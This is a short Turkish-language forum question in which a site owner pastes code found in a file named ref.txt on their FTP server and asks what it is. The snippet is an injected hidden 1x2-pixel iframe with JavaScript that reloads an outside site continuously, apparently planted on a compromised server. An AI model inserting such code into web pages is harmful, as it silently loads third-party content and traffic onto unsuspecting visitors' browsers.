Merhaba , ftp'ye girdiğimde şöye bir dosya vardı ref.txt diye bu ref.txt'in içinde şu kodlar var acaba ne kodudur bu ?
Alıntı
<script type="text/javascript"><!--
// set your interval in milliseconds
var reloadInterval = 0;
// this will run when the document is fully loaded
function init() {
setTimeout('reload()',reloadInterval);
}
// this reloads the iframe, and triggers the next reload interval
function reload() {
var iframe = document.getElementById('reloader');
if (!iframe) return false;
iframe.src = iframe.src;
setTimeout('reload()',reloadInterval);
}
// load the init() function when the page is fully loaded
window.onload = init;
--></script>
</head>
<body>
<iframe frameborder=0 scrolling=no id="reloader" width="1" height="2" src="http://www.sevda.tk/index.html"/>
</iframe>
bunun ne olduğunu söylermisiniz ?